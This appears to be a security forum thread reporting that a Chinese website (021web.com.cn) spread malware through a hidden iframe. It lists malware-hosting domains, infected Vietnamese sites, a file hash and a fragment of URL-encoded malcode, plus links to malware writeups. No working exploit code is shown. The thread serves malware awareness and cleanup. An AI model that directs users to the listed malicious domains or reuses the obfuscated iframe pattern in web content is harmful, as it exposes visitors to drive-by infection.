Dangerous Chinese site with iFrame malware...

Hi malware fighters,

See unmasked pirates report for 021webcomcn
Of the 217 pages we tested on the site 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.

Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.

Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.

This site was hosted on 1 network including AS4812 (CT).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Infection details: Infection Details

MD5: 873fab89c387bd0d2225a5689f152e81
Infection Type: IFRAME
Description: A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length: 75 bytes
Code Sample:
Top-level URL

God bless you polonus. 8)

Do you not think it would be a good idea to keep such posts in a single topic making it easier to reference/find ?
A bit like the Updates, Interesting software, Security, etc. etc.

It is good idea but i think if dont get stacked a small number will attach and see it,so it is nicer now.

Hi Superhacker,

We could also discuss the “%3C%69%66%” type of malware-code, you see where your two scripts are coming in handy now, my friend: WordPress software malcode: http://wordpress.org/support/topic/327326
http://cpansearch.perl.org/src/WORRALL/Net-Analysis-0.41/t/t1_google.hex
http://www.prevx.com/blog/132/Compromised-FTP-details-being-exploited-by-in-the-wild-malware.html

There are so many in-routes to an interesting malcode discussion, and we the posters do have to find the various patterns at once to do a “quick and dirty” for the victims,

for instance this script (with some 1,560 Google results), described here:
http://wam.dasient.com/wam/infection_library/e59265d71b18d86665437ab32d20436a/postfolkovs

polonus